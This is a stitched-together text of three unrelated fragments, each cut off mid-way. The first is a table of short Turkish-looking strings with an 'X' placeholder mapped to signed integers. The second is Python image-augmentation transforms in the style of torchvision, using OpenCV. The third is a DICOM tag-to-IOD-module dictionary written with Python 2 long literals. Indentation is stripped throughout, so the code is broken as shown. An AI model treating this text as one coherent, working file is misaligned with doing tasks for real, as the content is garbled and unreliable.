"nU X ": 95, "Xnita": -96, "Oy lX": 97, "bXkat": 98, "yad X": 99,
" itsX": 100, "kU zX": 101, "ogXnk": -102, " cUlX": -103, "cXlus": 104,
"lXkun": -105, "iyedX": 106, "GangX": 107, "pXste": 108, "sXste": 109,
" Xrin": 110, "yergX": -111, "i Xld": 112, "zz tX": 113, "lXsse": 114,
"adOlX": -115, "3 nX ": 116, "bambX": -117, "kXsey": -118, "i Xr ": -119,
" trXk": 120, "yIndX": 121, "mad X": -122, "GardX": 123, "Ok mX": 124,
" rUcX": -125, "tXsev": 126, "hXku ": 127, " Xsst": 128, "hulXl": 129,
"S dXo": 130, "gge X": 131, " Xyke": 132, "U alX": 133, "et X ": 134,
"rC gX": -135, "Xrgem": 136, "ingXs": -137, "Xvero": -138, "ei kX": -139,
"mXkur": -140, "Xiti ": 141, "Xrba ": -142, "sXtre": 143, "13 tX": 144,
"hXmet": 145, "Xhlef": -146, "UC X ": 147, "sfatX": 148, "Xmmuh": 149,
"enusX": 150, "mXhr ": 151, "UslXk": 152, " Xsur": 153, "sXmel": -154,
"ok zX": 155, "0 yX ": 156, "gXlli": -157, "lXzun": -158, "Xtlur": 159,
" 0 tX": -160, "k Xz ": 161, "Xctuu": 162, "huldX": 163, "Xrkua": -164, "ak X ": 165,
"sXkay": -166, "sXled": -167, "tUpsX": 168, "h dXr": -169, "Xhuri": -170, "tol X": 171,
"erkXn": 172, "bXrud": 173, "jOr X": 174, "hXsev": 175, " bXrl": -176,
"ue cX": -177, "StXyu": 178, "n lXm": 179, "Xliyy": 180, " yXne": -181,
"Xresh": -182, " cXr ": 183, "vandX": -184, "Xnifi": -185, "Xngus": 186,
"Xrita": -187, "mi X ": -188, "Xvete": 189, "tXsib": 190, "Ci Xs": 191,
"wandX": -192, "g Xnv": 193, "hi Xn": -194, " klXm": -195, " tUSX": -196,
"tXyug": -197, "n tX ": 198, " g mX": -199, " nXss": 200, "bi X ": -201,
"rm X ": 202, "mkXm ": 203, " I lX": -204, " bXta": -205, "olXme": -206,
"Xtlaa": 207, "uIp X": -208, "dis X": -209, " orgX": -210, "dr zX": 211,
" fXnu": 212, "mI Xb": 213, "n yX ": 214, "yrXl ": 215, "irk X": 216,
"Uks X": 217, "duh X": 218, "zallX": 219, " yXve": 220, "abakX": 221,
" bXto": -222, "ptXn ": 223, "l Xsu": -224, "Uh mX": 225, "m Xnc": 226,
"g yXn": -227, "i hX ": 228, "Xveti": 229, "satXk": -230, "tXnet": 231,
"bXruy": 232, "tXzud": -233, "3 nXn": 234, "kXrts": 235, "Xrruo": 236,
"a mX ": 237, "kap X": -238, " Xlt": -239, "hXkul": 240, "3 yX ": 241,
"Off X": 242, "Xrtee": -243, "Ut kX": -244, "gXlug": -245, "s mX ": 246,
"Ul lX": 247, "mXski": -248, "r dXl": -249, "Xtsu ": 250, "dXkas": -251,
"tUk X": 252, "mXsar": -253, "Xsusm": 254, " m X ": 255, "tf nX": 256,
"r Xlt": -257, "rks X": 258, "prokX": 259, "mXril": -260, "Xruks": 261,
"jI Xc": -262, "be lX": 263, "kabbX": -264, " gXye": -265, "Xroyo": -266,
"hi CX": -267, " Xzga": -268, "kXrtt": 269, "rikXt": 270, "UC lX": 271,
" kXp ": 272, "zut X": -273, "Xyluo": -274, "a dX ": 275, "Ulk X": 276, "izamX": 277,
"zeynX": 278, "yUz X": 279, "rU jX": -280, "ko tX": 281, "ns Xs": 282,
"Ukm X": 283, "Xruri": -284, "di X ": -285, "g sXp": -286, " mXk ": -287,
"asXre": -288, "Sun X": 289, "erg X": 290, "sellX": 291, "Xtayi": -292,
"s Xsl": -293, "Xlali": -294, "e rXb": 295, "r Xss": 296, "rls X": 297,
"bdulX": 298, "k h X": 299, "y tXb": -300, "ytemX": 301, "e tX ": 302,
"gXrba": -303, "IS pX": -304, "sXylu": 305, "mXcu ": -306, " mX ": 307,
"lorX ": 308, " Xcuy": -309, "yekXm": -310, "ee tX": 311, "gs bX": -312,
" indX": -313, "gXri ": -314, "m Xnv": 315, "Ip Xn": 316, "UrtCX": 317,
"Xzari": 318, "rU hX": 319, " hXru": -320, "polXn": 321, "Xlca ": -322,
"ot lX": -323, "kXlel": -324, "mXbil": -325, "gXrke": -326, "Xterl": 327,
"mXzlu": -328, "Se Xm": 329, " hUdX": -330, "n rX ": -331, "r pXt": -332,
"e Xhu": 333, "lt lX": 334, "ova X": 335, "kXrse": 336, "to sX": -337,
"Xskum": -338, "Xdusu": 339, "Xretc": 340, "r izX": 341, "kXlut": 342,
"laykX": 343, "rmatX": 344, "rIS X": -345, "ze Xs": 346, "kXmbe": 347,
"rXtuk": 348, " Xcus": -349, "Xbeyr": -350, "ef Xn": 351, "rkXte": 352,
"Xlas ": -353, "tI X ": 354, "aribX": -355, "kulXy": -356, "orlXr": 357,
"n sXk": 358, "Xturo": 359, "kXbiz": 360, "l p X": 361, "Xzaya": -362,
"m alX": 363, "ul gX": 364, "rn mX": 365, "Xnsel": 366, "mXsab": 367,
"tU tX": 368, "C kXs": -369, "n Xf ": 370, "m Xct": 371, "fi Xc": -372,
"eS Xn": 373, "Xdus ": -374, "sormX": -375, "s dXr": -376, "Xrge ": 377,
"Xrkos": -378, "ore X": -379, "k dX ": 380, "sla X": -381, "00 fX": 382,
"mXral": -383, "age X": -384, "tXnc ": -385, "mXhen": 386, "SaygX": 387,
"elXcl": 388, "Xmdan": -389, "l alX": 390, "lektX": 391, "ur rX": -392, "mXrsa": -393,
"UtXne": 394, "nSUmX": -395, "Xlak ": -396, "su gX": 397, "Xrsan": -398,
"mXrid": 399, "igXre": -400, "a gX ": -401, " kXre": 402, " kXnu": 403,
"mXssa": -404, "Xvenc": 405, "Xrmes": 406, "Xrgul": -407, "epeX": 408,
"acXm": 409, "Xrrt": 410, "Xmob": -411, "anXp": 412, "Xfam": 413,
"pXrn": 414, "nnXk": -415, "rtdX": -416, "fUcX": -417, "fXcu": 418,
"rtcX": 419, "mXmm": -420, "mXif": 421, "cz X": 422, "lXrr": 423,
"nyXa": 424, "ulCX": -425, "Xsef": 426, "Xsfa": -427, "lksX": 428,
"cXpe": -429, "OSrX": 430, " Xnt": 431, "gXbb": -432, "hinX": -433,
"OStX": 434, "kekX": | |
len(size) == 2, "Please provide only two dimensions (h, w) for size."
self.size = size
def __call__(self, img):
return F.five_crop(img, self.size)
def __repr__(self):
return self.__class__.__name__ + '(size={0})'.format(self.size)
class TenCrop(object):
"""Crop the given numpy ndarray into four corners and the central crop plus the flipped version of
these (horizontal flipping is used by default)
.. Note::
This transform returns a tuple of images and there may be a mismatch in the number of
inputs and targets your Dataset returns. See below for an example of how to deal with
this.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
vertical_flip(bool): Use vertical flipping instead of horizontal
Example:
>>> transform = Compose([
>>> TenCrop(size), # this is a list of numpy ndarrays
>>> Lambda(lambda crops: torch.stack([ToTensor()(crop) for crop in crops])) # returns a 4D tensor
>>> ])
>>> #In your test loop you can do the following:
>>> input, target = batch # input is a 5d tensor, target is 2d
>>> bs, ncrops, c, h, w = input.size()
>>> result = model(input.view(-1, c, h, w)) # fuse batch size and ncrops
>>> result_avg = result.view(bs, ncrops, -1).mean(1) # avg over crops
"""
def __init__(self, size, vertical_flip=False):
self.size = size
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
assert len(size) == 2, "Please provide only two dimensions (h, w) for size."
self.size = size
self.vertical_flip = vertical_flip
def __call__(self, img):
return F.ten_crop(img, self.size, self.vertical_flip)
def __repr__(self):
return self.__class__.__name__ + '(size={0}, vertical_flip={1})'.format(self.size, self.vertical_flip)
class LinearTransformation(object):
"""Transform a tensor image with a square transformation matrix computed
offline.
Given transformation_matrix, will flatten the torch.*Tensor, compute the dot
product with the transformation matrix and reshape the tensor to its
original shape.
Applications:
- whitening: zero-center the data, compute the data covariance matrix
[D x D] with np.dot(X.T, X), perform SVD on this matrix and
pass it as transformation_matrix.
Args:
transformation_matrix (Tensor): tensor [D x D], D = C x H x W
"""
def __init__(self, transformation_matrix):
if transformation_matrix.size(0) != transformation_matrix.size(1):
raise ValueError("transformation_matrix should be square. Got " +
"[{} x {}] rectangular matrix.".format(*transformation_matrix.size()))
self.transformation_matrix = transformation_matrix
def __call__(self, tensor):
"""
Args:
tensor (Tensor): Tensor image of size (C, H, W) to be whitened.
Returns:
Tensor: Transformed image.
"""
if tensor.size(0) * tensor.size(1) * tensor.size(2) != self.transformation_matrix.size(0):
raise ValueError("tensor and transformation matrix have incompatible shape." +
"[{} x {} x {}] != ".format(*tensor.size()) +
"{}".format(self.transformation_matrix.size(0)))
flat_tensor = tensor.view(1, -1)
transformed_tensor = torch.mm(flat_tensor, self.transformation_matrix)
tensor = transformed_tensor.view(tensor.size())
return tensor
def __repr__(self):
format_string = self.__class__.__name__ + '('
format_string += (str(self.transformation_matrix.numpy().tolist()) + ')')
return format_string
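# A minimal ZCA-whitening sketch showing one standard way to build a
# transformation_matrix for LinearTransformation (illustrative only, not part
# of the original API; the helper name below is hypothetical):
def _zca_whitening_matrix_example(X):
    """Build a [D x D] whitening matrix from a data tensor X of shape [N, D],
    where D = C * H * W. Assumes `torch` is available, as the transforms in
    this module already require."""
    X = X - X.mean(dim=0)                      # zero-center the data
    cov = torch.mm(X.t(), X) / X.size(0)       # data covariance matrix [D x D]
    U, S, _ = torch.svd(cov)                   # SVD of the covariance matrix
    inv_sqrt = torch.diag(1.0 / torch.sqrt(S + 1e-5))
    return torch.mm(torch.mm(U, inv_sqrt), U.t())
    # usage sketch: whiten = LinearTransformation(_zca_whitening_matrix_example(X))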
class ColorJitter(object):
"""Randomly change the brightness, contrast and saturation of an image.
Args:
brightness (float or tuple of float (min, max)): How much to jitter brightness.
brightness_factor is chosen uniformly from [max(0, 1 - brightness), 1 + brightness]
or the given [min, max]. Should be non-negative numbers.
contrast (float or tuple of float (min, max)): How much to jitter contrast.
contrast_factor is chosen uniformly from [max(0, 1 - contrast), 1 + contrast]
or the given [min, max]. Should be non-negative numbers.
saturation (float or tuple of float (min, max)): How much to jitter saturation.
saturation_factor is chosen uniformly from [max(0, 1 - saturation), 1 + saturation]
or the given [min, max]. Should be non-negative numbers.
hue (float or tuple of float (min, max)): How much to jitter hue.
hue_factor is chosen uniformly from [-hue, hue] or the given [min, max].
Should have 0 <= hue <= 0.5 or -0.5 <= min <= max <= 0.5.
"""
def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):
self.brightness = self._check_input(brightness, 'brightness')
# self.brightness = brightness
self.contrast = self._check_input(contrast, 'contrast')
# self.contrast = contrast
self.saturation = self._check_input(saturation, 'saturation')
# self.saturation = saturation
self.hue = self._check_input(hue, 'hue', center=0, bound=(-0.5, 0.5),
clip_first_on_zero=False)
# self.hue = hue
if self.saturation is not None:
warnings.warn('Saturation jitter enabled. Will slow down loading immensely.')
if self.hue is not None:
warnings.warn('Hue jitter enabled. Will slow down loading immensely.')
def _check_input(self, value, name, center=1, bound=(0, float('inf')), clip_first_on_zero=True):
if isinstance(value, numbers.Number):
if value < 0:
raise ValueError("If {} is a single number, it must be non negative.".format(name))
value = [center - value, center + value]
if clip_first_on_zero:
value[0] = max(value[0], 0)
elif isinstance(value, (tuple, list)) and len(value) == 2:
if not bound[0] <= value[0] <= value[1] <= bound[1]:
raise ValueError("{} values should be between {}".format(name, bound))
else:
raise TypeError("{} should be a single number or a list/tuple with length 2.".format(name))
# if value is 0 or (1., 1.) for brightness/contrast/saturation
# or (0., 0.) for hue, do nothing
if value[0] == value[1] == center:
value = None
return value
@staticmethod
def get_params(brightness, contrast, saturation, hue):
"""Get a randomized transform to be applied on image.
Arguments are same as that of __init__.
Returns:
Transform which randomly adjusts brightness, contrast and
saturation in a random order.
"""
transforms = []
if brightness is not None: # if brightness > 0:
brightness_factor = random.uniform(brightness[0], brightness[1])
# brightness_factor = random.uniform(max(0, 1 - brightness), 1 + brightness)
transforms.append(Lambda(lambda img: F.adjust_brightness(img, brightness_factor)))
if contrast is not None: # if contrast > 0:
contrast_factor = random.uniform(contrast[0], contrast[1])
# contrast_factor = random.uniform(max(0, 1 - contrast), 1 + contrast)
transforms.append(Lambda(lambda img: F.adjust_contrast(img, contrast_factor)))
if saturation is not None: # if saturation > 0:
saturation_factor = random.uniform(saturation[0], saturation[1])
# saturation_factor = random.uniform(max(0, 1 - saturation), 1 + saturation)
transforms.append(Lambda(lambda img: F.adjust_saturation(img, saturation_factor)))
if hue is not None: # if hue > 0:
hue_factor = random.uniform(hue[0], hue[1])
# hue_factor = random.uniform(-hue, hue)
transforms.append(Lambda(lambda img: F.adjust_hue(img, hue_factor)))
random.shuffle(transforms)
transform = Compose(transforms)
return transform
def __call__(self, img):
"""
Args:
img (numpy ndarray): Input image.
Returns:
numpy ndarray: Color jittered image.
"""
transform = self.get_params(self.brightness, self.contrast,
self.saturation, self.hue)
return transform(img)
def __repr__(self):
format_string = self.__class__.__name__ + '('
format_string += 'brightness={0}'.format(self.brightness)
format_string += ', contrast={0}'.format(self.contrast)
format_string += ', saturation={0}'.format(self.saturation)
format_string += ', hue={0})'.format(self.hue)
return format_string
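# Usage sketch for ColorJitter (illustrative): ColorJitter(brightness=0.4)
# draws a brightness_factor uniformly from [0.6, 1.4] on every call, and
# ColorJitter(hue=0.1) draws a hue_factor from [-0.1, 0.1]; passing a
# (min, max) tuple such as ColorJitter(contrast=(0.8, 1.2)) uses that range
# directly, so repeated calls on the same image give different results.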
class RandomRotation(object):
"""Rotate the image by angle.
Args:
degrees (sequence or float or int): Range of degrees to select from.
If degrees is a number instead of sequence like (min, max), the range of degrees
will be (-degrees, +degrees), in clockwise order.
resample ({cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_LANCZOS4}, optional):
An optional resampling filter. See `filters`_ for more information.
If omitted, or if the image has mode "1" or "P", it is set to cv2.INTER_NEAREST.
expand (bool, optional): Optional expansion flag.
If true, expands the output to make it large enough to hold the entire rotated image.
If false or omitted, make the output image the same size as the input image.
Note that the expand flag assumes rotation around the center and no translation.
center (2-tuple, optional): Optional center of rotation.
Origin is the upper left corner.
Default is the center of the image.
"""
def __init__(self, degrees, resample=cv2.INTER_NEAREST, expand=False, center=None):
# def __init__(self, degrees, resample='BILINEAR', expand=False, center=None):
if isinstance(degrees, numbers.Number):
if degrees < 0:
raise ValueError("If degrees is a single number, it must be positive.")
self.degrees = (-degrees, degrees)
else:
if len(degrees) != 2:
raise ValueError("If degrees is a sequence, it must be of len 2.")
self.degrees = degrees
self.resample = resample
self.expand = expand
self.center = center
@staticmethod
def get_params(degrees):
"""Get parameters for ``rotate`` for a random rotation.
Returns:
sequence: params to be passed to ``rotate`` for random rotation.
"""
angle = random.uniform(degrees[0], degrees[1])
return angle
def __call__(self, img):
"""
img (numpy ndarray): Image to be rotated.
Returns:
numpy ndarray: Rotated image.
"""
angle = self.get_params(self.degrees)
return F.rotate(img, angle, self.resample, self.expand, self.center)
def __repr__(self):
format_string = self.__class__.__name__ + '(degrees={0}'.format(self.degrees)
format_string += ', resample={0}'.format(self.resample)
format_string += ', expand={0}'.format(self.expand)
if self.center is not None:
format_string += ', center={0}'.format(self.center)
format_string += ')'
return format_string
class RandomAffine(object):
"""Random affine transformation of the image keeping center invariant
Args:
degrees (sequence or float or int): Range | |
X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Patient'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Patient'],
'BASIC TEXT SR IOD': ['Patient'],
'NM IMAGE IOD': ['Patient'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'LENSOMETRY MEASUREMENTS IOD': ['Patient'],
'MR SPECTROSCOPY IOD': ['Patient'],
'ENCAPSULATED PDF IOD': ['Patient'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CHEST CAD SR IOD': ['Patient'],
'HEMODYNAMIC IOD': ['Patient'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Patient'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Patient'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Patient'],
'ENHANCED MR COLOR IMAGE IOD': ['Patient'],
'ENHANCED CT IMAGE IOD': ['Patient'],
'X-RAY RADIATION DOSE SR IOD': ['Patient'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Patient'],
'PROCEDURE LOG IOD': ['Patient'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Patient'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Patient'],
'STEREOMETRIC RELATIONSHIP IOD': ['Patient'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Patient'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Patient'],
'VL ENDOSCOPIC IMAGE IOD': ['Patient'],
'KERATOMETRY MEASUREMENTS IOD': ['Patient'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Patient'],
'COMPREHENSIVE SR IOD': ['Patient'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Patient'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Patient'],
'SPATIAL FIDUCIALS IOD': ['Patient'],
'RT ION PLAN IOD': ['Patient'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CT IMAGE IOD': ['Patient'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Patient'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Patient'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Patient'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'RT DOSE IOD': ['Patient'],
'AMBULATORY ECG IOD': ['Patient'],
'SURFACE SEGMENTATION IOD': ['Patient'],
'MAMMOGRAPHY CAD SR IOD': ['Patient'],
'VL MICROSCOPIC IMAGE IOD': ['Patient'],
'RT BEAMS TREATMENT RECORD IOD': ['Patient'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Patient'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'RT IMAGE IOD': ['Patient'],
'SC IMAGE IOD': ['Patient'],
None: ['Patient'],
'SEGMENTATION IOD': ['Patient'],
'PET IMAGE IOD': ['Patient'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'DIGITAL X-RAY IMAGE IOD': ['Patient'],
'REAL WORLD VALUE MAPPING IOD': ['Patient'],
'SPATIAL REGISTRATION IOD': ['Patient'],
'COLON CAD SR IOD': ['Patient'],
'INTRAVASCULAR OCT IMAGE IOD': ['Patient'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'ENHANCED PET IMAGE IOD': ['Patient'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Patient'],
'US MULTI-FRAME IMAGE IOD': ['Patient'],
'ENHANCED X-RAY RF IMAGE IOD': ['Patient'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Patient'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Patient'],
'US IMAGE IOD': ['Patient'],
'GENERAL ECG IOD': ['Patient'],
'XRF IMAGE IOD': ['Patient'],
'ENCAPSULATED CDA IOD': ['Patient'],
'ENHANCED SR IOD': ['Patient'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'GENERAL AUDIO WAVEFORM IOD': ['Patient'],
'MR IMAGE IOD': ['Patient'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Patient'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Patient'],
'ARTERIAL PULSE WAVEFORM IOD': ['Patient'],
},
# ResponsibleOrganization
0x00102299L: {
'BASIC STRUCTURED DISPLAY IOD': ['Patient'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Patient'],
'RT BRACHY TREATMENT RECORD IOD': ['Patient'],
'RT STRUCTURE SET IOD': ['Patient'],
'RT PLAN IOD': ['Patient'],
'CR IMAGE IOD': ['Patient'],
'RAW DATA IOD': ['Patient'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Patient'],
'ENHANCED MR IMAGE IOD': ['Patient'],
'BASIC CARDIAC EP IOD': ['Patient'],
'RT TREATMENT SUMMARY RECORD IOD': ['Patient'],
'12-LEAD ECG IOD': ['Patient'],
'RESPIRATORY WAVEFORM IOD': ['Patient'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Patient'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Patient'],
'BASIC VOICE AUDIO IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Patient'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Patient'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Patient'],
'BASIC TEXT SR IOD': ['Patient'],
'NM IMAGE IOD': ['Patient'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'LENSOMETRY MEASUREMENTS IOD': ['Patient'],
'MR SPECTROSCOPY IOD': ['Patient'],
'ENCAPSULATED PDF IOD': ['Patient'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CHEST CAD SR IOD': ['Patient'],
'HEMODYNAMIC IOD': ['Patient'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Patient'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Patient'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Patient'],
'ENHANCED MR COLOR IMAGE IOD': ['Patient'],
'ENHANCED CT IMAGE IOD': ['Patient'],
'X-RAY RADIATION DOSE SR IOD': ['Patient'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Patient'],
'PROCEDURE LOG IOD': ['Patient'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Patient'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Patient'],
'STEREOMETRIC RELATIONSHIP IOD': ['Patient'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Patient'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Patient'],
'VL ENDOSCOPIC IMAGE IOD': ['Patient'],
'KERATOMETRY MEASUREMENTS IOD': ['Patient'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Patient'],
'COMPREHENSIVE SR IOD': ['Patient'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Patient'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Patient'],
'SPATIAL FIDUCIALS IOD': ['Patient'],
'RT ION PLAN IOD': ['Patient'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CT IMAGE IOD': ['Patient'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Patient'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Patient'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Patient'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'RT DOSE IOD': ['Patient'],
'AMBULATORY ECG IOD': ['Patient'],
'SURFACE SEGMENTATION IOD': ['Patient'],
'MAMMOGRAPHY CAD SR IOD': ['Patient'],
'VL MICROSCOPIC IMAGE IOD': ['Patient'],
'RT BEAMS TREATMENT RECORD IOD': ['Patient'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Patient'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'RT IMAGE IOD': ['Patient'],
'SC IMAGE IOD': ['Patient'],
None: ['Patient'],
'SEGMENTATION IOD': ['Patient'],
'PET IMAGE IOD': ['Patient'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'DIGITAL X-RAY IMAGE IOD': ['Patient'],
'REAL WORLD VALUE MAPPING IOD': ['Patient'],
'SPATIAL REGISTRATION IOD': ['Patient'],
'COLON CAD SR IOD': ['Patient'],
'INTRAVASCULAR OCT IMAGE IOD': ['Patient'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'ENHANCED PET IMAGE IOD': ['Patient'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Patient'],
'US MULTI-FRAME IMAGE IOD': ['Patient'],
'ENHANCED X-RAY RF IMAGE IOD': ['Patient'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Patient'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Patient'],
'US IMAGE IOD': ['Patient'],
'GENERAL ECG IOD': ['Patient'],
'XRF IMAGE IOD': ['Patient'],
'ENCAPSULATED CDA IOD': ['Patient'],
'ENHANCED SR IOD': ['Patient'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'GENERAL AUDIO WAVEFORM IOD': ['Patient'],
'MR IMAGE IOD': ['Patient'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Patient'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Patient'],
'ARTERIAL PULSE WAVEFORM IOD': ['Patient'],
},
# IlluminationTypeCodeSequence
0x00220016L: {
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'],
None: ['Image'],
},
# TypeOfDetectorMotion
0x00540202L: {
'NM IMAGE IOD': ['Image'],
'ENHANCED PET IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Series'],
None: ['Image', 'Series'],
},
# ScheduledProcedureStepStartDateTime
0x00404005L: {
'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'],
'GENERAL PURPOSE SCHEDULED PROCEDURE STEP IOD': ['General Purpose Scheduled Procedure Step'],
None: ['Unified Procedure Step', 'General Purpose Scheduled Procedure Step'],
},
# TerminationRelativeDensityThreshold
0x00189721L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# BreastImplantPresent
0x00281300L: {
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Image'],
None: ['Image'],
},
# RectilinearPhaseEncodeReordering
0x00189034L: {
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'ENHANCED MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# ImplantRegulatoryDisapprovalCodeSequence
0x006862A0L: {
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
None: ['Implant Template'],
},
# CalculatedDoseReferenceSequence
0x30080070L: {
'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
None: ['Treatment Record'],
},
# ReasonForPerformedProcedureCodeSequence
0x00401012L: {
'BASIC STRUCTURED DISPLAY IOD': ['Study'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Study'],
'RT BRACHY TREATMENT RECORD IOD': ['Study'],
'RT STRUCTURE SET IOD': ['Study'],
'RT PLAN IOD': ['Study'],
'CR IMAGE IOD': ['Study'],
'RAW DATA IOD': ['Study'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Study'],
'ENHANCED MR IMAGE IOD': ['Study'],
'BASIC CARDIAC EP IOD': ['Study'],
'RT TREATMENT SUMMARY RECORD IOD': ['Study'],
'MODALITY PERFORMED PROCEDURE STEP IOD': ['Modality Performed Procedure Step'],
'12-LEAD ECG IOD': ['Study'],
'RESPIRATORY WAVEFORM IOD': ['Study'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Study'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Study'],
'BASIC VOICE AUDIO IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Study'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Study'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Study'],
'BASIC TEXT SR IOD': ['Study'],
'NM IMAGE IOD': ['Study'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'LENSOMETRY MEASUREMENTS IOD': ['Study'],
'MR SPECTROSCOPY IOD': ['Study'],
'ENCAPSULATED PDF IOD': ['Study'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CHEST CAD SR IOD': ['Study'],
'HEMODYNAMIC IOD': ['Study'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Study'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Study'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Study'],
'ENHANCED MR COLOR IMAGE IOD': ['Study'],
'ENHANCED CT IMAGE IOD': ['Study'],
'X-RAY RADIATION DOSE SR IOD': ['Study'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Study'],
